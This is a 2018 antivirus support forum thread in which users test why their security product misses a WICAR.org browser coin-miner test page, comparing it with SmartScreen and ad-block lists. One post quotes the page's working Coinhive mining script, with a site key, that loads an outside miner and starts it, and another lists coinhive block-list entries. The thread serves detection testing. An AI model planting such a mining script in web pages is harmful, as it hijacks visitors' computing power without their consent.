itman 1,746 Posted July 27, 2018 Share Posted July 27, 2018 (edited) http://malware.wicar.org/data/js_crypto_miner.html This one actually does coin mining. Also doesn't look good that SmartScreen detected it. At least now I can say I found something that SmartScreen detects that Eset doesn't.? Edited July 27, 2018 by itman Link to comment Share on other sites More sharing options...
Administrators Marcos 5,257 Posted July 27, 2018 Administrators Share Posted July 27, 2018 I'm getting an alert: https://coinhive.com/lib/coinhive.min.js;JS/CoinMiner.D potentially unwanted application;blocked Link to comment Share on other sites More sharing options...
itman 1,746 Posted July 27, 2018 Author Share Posted July 27, 2018 Just to be sure, I disabled SmartScreen in Edge and still no alert from Eset. Sure the same will happen in IE11. Eset always alerts prior to SmartScreen. Running EIS ver. 11.2.42 with default settings as far as Internet Protection goes. Link to comment Share on other sites More sharing options...
itman 1,746 Posted July 27, 2018 Author Share Posted July 27, 2018 Also, don't believe this is Coin Hive based since I have the following in an Eset URL block list and those didn't trigger either: *.coinhive.com/* *.coin-hive.com/* Link to comment Share on other sites More sharing options...
Administrators Marcos 5,257 Posted July 27, 2018 Administrators Share Posted July 27, 2018 Not sure what the problem could be. No problems here: Link to comment Share on other sites More sharing options...
itman 1,746 Posted July 27, 2018 Author Share Posted July 27, 2018 (edited) I don't get it either. Below is the code it is executing. The block list should have detected it regardless: Quote <html> <script src="https://coinhive.com/lib/coinhive.min.js"> </script><script>var miner = new CoinHive.Anonymous('VrqhGymiL9VzA7DO9YcZNzOVyNkY6tVS', {throttle: 0.3}); // Only start on non-mobile devices and if not opted-out // in the last 14400 seconds (4 hours): //if (!miner.isMobile() && !miner.didOptOut(14400)) { miner.start(); //} </script> </html> If I click on the coinhive link, the block list detects it. And all PUA detection settings are enabled. Edited July 27, 2018 by itman Link to comment Share on other sites More sharing options...
itman 1,746 Posted July 27, 2018 Author Share Posted July 27, 2018 @Marcos, it gets weirder. I am using Easylist Privacy tpl in IE11. Additional in Edge, I am using AdGuard extension with both Easylist Privacy and NoCoin lists. All these will detect Coinhive. None of them triggered in this Wicar.org coin miner test. So I went to the AMTSO Desktop Test site and ran the PUA test. Eset performed as expected and alerted on PUA detection. So at this point, I am at a loss as to why this is happening. Also I am running on Win 10 x(64) 1803. Looks like Wicar.org copied the code straight from here: https://medium.com/@bitcoinloverr/100-latest-coinhive-javascript-mining-trick-monero-b525f38ce545 Link to comment Share on other sites More sharing options...
0xDEADBEEF 43 Posted July 28, 2018 Share Posted July 28, 2018 Mine detects it, but I have to disable my adblock plugin to see ESET's prompt because my adblock will block the mining script before ESET kicks in. Link to comment Share on other sites More sharing options...
itman 1,746 Posted July 28, 2018 Author Share Posted July 28, 2018 (edited) - Posting edited to reflect what the issue really was - Indeed, further testing confirmed tracking protection lists used in Edge and IE11 were intercepting and blocking the connection to coinhive.com prior to Eset having a chance to do likewise. As far as the SmartScreen alert, it is a bogus one as most browser based SmartScreen alerts are. All SmartScreen is blocking is access to the wicar.org coin miner test web site; not any actual coin mining activity occurring there. Edited July 29, 2018 by itman Link to comment Share on other sites More sharing options...
itman 1,746 Posted July 28, 2018 Author Share Posted July 28, 2018 (edited) Will also add that I found an obscure European coinhive test web site that SmartScreen does not detects to test Eset's coin miner protection. Edited July 29, 2018 by itman Link to comment Share on other sites More sharing options...
Recommended Posts